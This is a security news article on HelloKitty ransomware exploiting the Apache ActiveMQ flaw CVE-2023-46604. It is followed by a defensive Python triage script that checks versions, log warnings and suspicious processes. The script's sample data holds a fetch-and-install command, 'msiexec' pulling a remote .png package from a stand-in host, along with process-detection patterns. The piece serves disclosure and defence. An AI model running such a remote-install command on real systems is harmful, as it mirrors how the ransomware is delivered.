The HelloKitty ransomware operation is exploiting a recently disclosed Apache ActiveMQ remote code execution (RCE) flaw to breach networks and encrypt devices.
The flaw, tracked as CVE-2023-46604, is a critical-severity (CVSS v3 score: 10.0) RCE that allows attackers to execute arbitrary shell commands by exploiting the serialized class types in the OpenWire protocol.
The security problem was addressed in a security update on October 25, 2023. However, threat monitoring service ShadowServer reported that, as of October 30, there were still 3,329 internet-exposed servers running a version vulnerable to exploitation.
Yesterday, Rapid7 reported that it had observed at least two distinct cases of threat actors exploiting CVE-2023-46604 in customer environments to deploy HelloKitty ransomware binaries and extort the targeted organizations.
HelloKitty is a ransomware operation that launched in November 2020 and recently had its source code leaked on a Russian-speaking cybercrime forum, making it available to anyone.
The attacks observed by Rapid7 started on October 27, two days after Apache released the security bulletin and fixes, so this appears to be a case of n-day exploitation.
Rapid7 analyzed two MSI files disguised as PNG images, fetched from a suspicious domain, and found that they contain a .NET executable that loads a base64-encoded .NET DLL named EncDLL.
EncDLL is responsible for searching for and stopping specific processes, encrypting files with the RSACryptoServiceProvider function, and appending a ".locked" extension to them.
Some artifacts left behind by these attacks include:
- Java.exe running with an Apache application as the parent process, which is atypical.
- Loading of remote binaries named M2.png and M4.png via MSIExec, indicative of malicious activity.
- Repeated, failed attempts to encrypt files, signaling clumsy exploitation efforts.
- Log entries in activemq.log showing warnings about transport connections failing due to an aborted connection, which may suggest exploitation.
- Presence of files or network communications associated with the HelloKitty ransomware, identifiable by specific domains and file hashes.
The Rapid7 report contains information about the latest HelloKitty indicators of compromise, but more comprehensive data on that front can be found in this FBI report focused on the ransomware family.
The latest ShadowServer stats show that there are still thousands of vulnerable ActiveMQ instances out there, so administrators are urged to apply the available security updates as soon as possible.
Vulnerable versions range between 5.15 and 5.18, including Legacy OpenWire Module versions, and are fixed in versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3.
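As an added example (not Rapid7's, Apache's or the article's own code), the following Python script turns the artifact list above and the version ranges just given into checks a defender can run: a version check against the fixed releases the article names, a scan of activemq.log lines for the aborted-transport warning, and a process-snapshot check for MSIExec spawned by the ActiveMQ broker's java.exe to fetch a remote .png. The log lines, process records, IP address and domain are constructed for illustration and only approximate real ActiveMQ output; the warning pattern is written from the article's description rather than from a confirmed log sample, and the process-snapshot shape (pid, ppid, image, command line) is an assumption.

```python
"""Triage helpers for the CVE-2023-46604 / HelloKitty indicators the article
lists. Added example, not Rapid7's or Apache's code. Sample log lines and
process records are constructed and only approximate real ActiveMQ output."""
import re
from typing import Iterable, Optional

# Fixed versions as stated in the article (5.15.16, 5.16.7, 5.17.6, 5.18.3),
# keyed by the affected 5.15 - 5.18 branch.
FIXED_VERSIONS = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(text: str) -> tuple:
    """Turn '5.17.3' (or '5.17.3-SNAPSHOT', or a bare '5.18') into 3 ints."""
    parts = [int(n) for n in re.findall(r"\d+", text)[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def activemq_status(version: str) -> Optional[str]:
    """'vulnerable' or 'fixed' for the 5.15-5.18 branches the article names;
    None for any other branch, which the article does not cover."""
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[:2])
    if fixed is None:
        return None
    return "fixed" if v >= fixed else "vulnerable"


# Matches the warning the article describes: a transport connection that
# failed because the peer aborted it. Assumed pattern, written from the
# article's wording rather than from a confirmed log sample.
ABORTED_TRANSPORT = re.compile(
    r"WARN.*Transport Connection to: (?P<peer>\S+) failed:.*aborted", re.IGNORECASE
)


def aborted_transport_peers(lines: Iterable[str]) -> list:
    """Return the remote peers named in aborted-transport warnings."""
    return [m.group("peer") for m in map(ABORTED_TRANSPORT.search, lines) if m]


def suspicious_children(procs: list) -> list:
    """Flag children of the ActiveMQ broker's java.exe that match the article's
    artifacts: msiexec (or a shell) spawned by the broker, and msiexec loading
    a remote *.png 'package'. Snapshot shape (pid, ppid, image, cmdline) assumed."""
    by_pid = {p[0]: p for p in procs}
    findings = []
    for pid, ppid, image, cmdline in procs:
        parent = by_pid.get(ppid)
        if not parent or parent[2].lower() != "java.exe" or "activemq" not in parent[3].lower():
            continue
        reasons = []
        if image.lower() in ("msiexec.exe", "cmd.exe", "powershell.exe"):
            reasons.append(f"{image} spawned by the ActiveMQ broker")
        if image.lower() == "msiexec.exe" and re.search(r"https?://\S+\.png", cmdline, re.I):
            reasons.append("msiexec fetching a remote .png 'package'")
        if reasons:
            findings.append((pid, reasons))
    return findings


# Constructed sample data (not real logs or a real host).
SAMPLE_LOG = [
    "2023-10-27 14:02:11,203 | INFO  | Apache ActiveMQ 5.17.3 (localhost) started",
    "2023-10-27 14:05:42,911 | WARN  | Transport Connection to: tcp://198.51.100.7:51322 failed: "
    "java.net.SocketException: An established connection was aborted by the software in your host machine",
    "2023-10-27 14:05:43,020 | WARN  | Transport Connection to: tcp://198.51.100.7:51323 failed: java.io.EOFException",
]
SAMPLE_PROCS = [
    (400, 1, "services.exe", "services.exe"),
    (1220, 400, "java.exe", r'"C:\activemq\jre\bin\java.exe" -jar activemq.jar start'),
    (3107, 1220, "msiexec.exe", "msiexec /q /i http://example.invalid/M2.png"),
    (3110, 400, "msiexec.exe", r"msiexec /i C:\Users\admin\Downloads\tool.msi"),
]

if __name__ == "__main__":
    print("5.17.3 ->", activemq_status("5.17.3"))
    print("aborted transport peers:", aborted_transport_peers(SAMPLE_LOG))
    for pid, reasons in suspicious_children(SAMPLE_PROCS):
        print(f"pid {pid}: " + "; ".join(reasons))
```

On the sample data, 5.17.3 is reported as vulnerable (below the 5.17.6 fix), the peer on port 51322 is the only aborted-transport warning, and only the msiexec process whose parent is the broker's java.exe is flagged; the second msiexec, launched under services.exe from a local .msi, is the benign case the parent check is meant to leave alone.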